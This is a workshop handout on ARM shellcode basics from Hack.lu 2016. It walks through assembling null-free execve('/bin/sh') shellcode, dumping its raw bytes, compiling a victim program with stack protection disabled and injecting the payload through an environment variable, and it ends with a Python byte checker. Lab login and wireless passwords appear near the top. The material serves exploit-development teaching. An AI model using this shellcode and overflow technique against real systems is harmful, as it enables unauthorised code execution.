ARM SHELLCODE BASICS WORKSHOP

ARM SHELLCODE BASICS WORKSHOP - HACK.LU 2016 - INSTRUCTIONS
-----------------------------------------------------------
Wireless network: exploitlab3, password: exploitlab
Web server: 10.50.1.41
Slides: http://10.50.1.41/ - click Exploit Skeleton Scripts and download the PDF.

Left side of the workshop:
    ssh [email protected]
    password: exploitlab

Right side of the workshop:
    ssh [email protected]
    password: exploitlab

Please make a copy of the "workshop/" directory to another directory of
your choice. We will be sharing this login ID, so please play nice!

mkdir my_unique_directory
cp workshop/* my_unique_directory

ARM ASSEMBLY THEORY
execve SHELLCODE
reverse shell SHELLCODE - exercise

LABELS
------
.section .text
.global _start

_start:
    mov r0, #1                  /* fd 1 = stdout */
    ldr r1, mystring_address    /* r1 = address of mystring, PC-relative load of the literal below */
    mov r2, #12                 /* length of "Hello World\n" */
    mov r7, #4                  /* syscall 4 = write */
    svc #0
    bkpt                        /* stop here; reported as "Trace/breakpoint trap" */

mystring_address:
    .word mystring              /* this label holds the absolute address of mystring */

.section .data

mystring:
    .ascii "Hello World\n\0"


as first.s -o first.o
ld first.o -o first
./first
Hello World
Trace/breakpoint trap

objdump -d first

Disassembly of section .text:

00008074 <_start>:
8074: e3a00001 mov r0, #1
8078: e59f100c ldr r1, [pc, #12] ; 808c
807c: e3a0200c mov r2, #12
8080: e3a07004 mov r7, #4
8084: ef000000 svc 0x00000000
8088: e1200070 bkpt 0x0000

0000808c <mystring_address>:
808c: 00010090 .word 0x00010090

$ objdump -d exec_thumb

exec_thumb: file format elf32-littlearm


Disassembly of section .text:

00008054 <_start>:
8054: e28f3001 add r3, pc, #1
8058: e12fff13 bx r3
805c: a002 add r0, pc, #8 ; (adr r0, 8068 <_start+0x14>)
805e: 1a49 subs r1, r1, r1
8060: 1c0a adds r2, r1, #0
8062: 270b movs r7, #11
8064: df01 svc 1
8066: 1c2d adds r5, r5, #0
8068: 6e69622f .word 0x6e69622f
806c: 0068732f .word 0x0068732f

exec_final.s
------------
.section .text
.global _start
_start:
.code 32
    add r3, pc, #1          /* pc reads as current address + 8 in ARM state; bit 0 set selects Thumb */
    bx r3                   /* branch to the next instruction, now in Thumb state */

.code 16
    add r0, pc, #8          /* r0 = address of "/bin/shX" (pc is 4-byte aligned here) */
    sub r1, r1, r1          /* r1 = 0 -> argv = NULL */
    mov r2, r1              /* r2 = 0 -> envp = NULL */
    strb r2, [r0, #7]       /* write null byte at end of /bin/sh (overwrites the 'X') */
    mov r7, #11             /* syscall 11, execve */
    svc #1

.ascii "/bin/shX"           /* the 'X' placeholder keeps the string free of null bytes */

as exec_final.s -o exec_final.o
ld -N exec_final.o -o exec_final
(-N makes the text segment writable, so the strb above can patch the string in place)

RAW SHELLCODE
-------------
objcopy -O binary exec_final exec_final.bin
                             ^^^^^^^^^^^^^^
                             raw shellcode, without the ELF data

hexdump -C exec_final.bin
Use this as shellcode.

Check the output:
[email protected]:~/blackhatcolombia$ hexdump -C exec_final.bin
00000000 01 30 8f e2 13 ff 2f e1 02 a0 49 1a 0a 1c c2 71 |.0..../...I....q|
00000010 0b 27 01 df 2f 62 69 6e 2f 73 68 58 |.'../bin/shX|
0000001c


Now compile the victim program:
[email protected]:~/blackhatcolombia$ make victim1
gcc -marm -O0 -fno-stack-protector -D_FORTIFY_SOURCE=0 -z execstack victim1.c -o victim1

Export EGG
[email protected]:~/blackhatcolombia$ export EGG=$(./smash1.pl)


Now we get the segmentation fault / breakpoint trap (bkpt). Next, put the execve shellcode into a copy of the script:

[email protected]:~/blackhatcolombia$ cp smash1.pl smash2.pl
[email protected]:~/blackhatcolombia$ ./hex_encode.pl exec_final.bin
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x1a\x0a\x1c\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58
[email protected]:~/blackhatcolombia$ vi smash2.pl

Add the new shellcode (the hex_encode.pl output above) to smash2.pl.

[email protected]:~/blackhatcolombia$ export EGG2=$(./smash2.pl)

[email protected]:~/blackhatcolombia$ ./victim1 "$EGG2"
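As an added example (not the workshop's hex_encode.pl or smash scripts), a small Python checker over the exec_final.bin bytes from the hexdump above: it renders the \x form, flags bytes that would cut a string-copied payload short, and decodes the Thumb strb to confirm its #7 lands exactly on the 'X' placeholder. The bad-byte set and the fixed strb offset are assumptions taken from the dump, not from the workshop material.

```python
import struct

# Constructed from the hexdump of exec_final.bin shown above (28 bytes, little-endian).
EXEC_FINAL = bytes.fromhex(
    "01308fe2" "13ff2fe1"            # ARM:   add r3, pc, #1 ; bx r3   (switch to Thumb)
    "02a0" "491a" "0a1c" "c271"      # Thumb: add r0,pc,#8 ; subs r1,r1,r1 ; adds r2,r1,#0 ; strb r2,[r0,#7]
    "0b27" "01df"                    # Thumb: movs r7,#11 ; svc 1
    "2f62696e2f736858"               # "/bin/shX"
)
STRB_OFFSET = 14          # byte offset of the strb halfword in the blob (assumed from the dump)
MARKER = b"/bin/shX"


def hex_encode(blob):
    """Render bytes as \\xNN escapes, the format hex_encode.pl prints for the smash scripts."""
    return "".join(f"\\x{b:02x}" for b in blob)


def find_bad_bytes(blob, bad=frozenset({0x00})):
    """(offset, value) of bytes that would cut the payload short. The default set is an
    assumption: only NUL matters when the payload travels through argv/env as here."""
    return [(i, b) for i, b in enumerate(blob) if b in bad]


def decode_thumb_strb_imm(halfword):
    """Decode a 16-bit Thumb 'strb Rt, [Rn, #imm5]' (top five bits 01110); None if not one."""
    if halfword >> 11 != 0b01110:
        return None
    return {"rt": halfword & 7, "rn": (halfword >> 3) & 7, "imm5": (halfword >> 6) & 0x1F}


def patched_byte_offset(blob, strb_off=STRB_OFFSET, marker=MARKER):
    """Offset of the byte the strb overwrites with 0, or -1 if the layout is wrong.
    Assumes r0 points at the marker (the add r0, pc, #8 before it) and r2 holds 0."""
    (hw,) = struct.unpack_from("<H", blob, strb_off)
    strb = decode_thumb_strb_imm(hw)
    start = blob.find(marker)
    if strb is None or start < 0 or strb["rn"] != 0:
        return -1
    target = start + strb["imm5"]
    # The store must land on the placeholder 'X', i.e. right after "/bin/sh".
    return target if blob[target:target + 1] == b"X" else -1


if __name__ == "__main__":
    print(hex_encode(EXEC_FINAL))
    print("bad bytes:", find_bad_bytes(EXEC_FINAL))
    print("strb patches offset:", patched_byte_offset(EXEC_FINAL))
    # A variant keeping "/bin/sh\0" in the string, as exec_thumb did: the checker flags the NUL.
    print("with literal NUL:", find_bad_bytes(EXEC_FINAL[:20] + b"/bin/sh\x00"))
```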
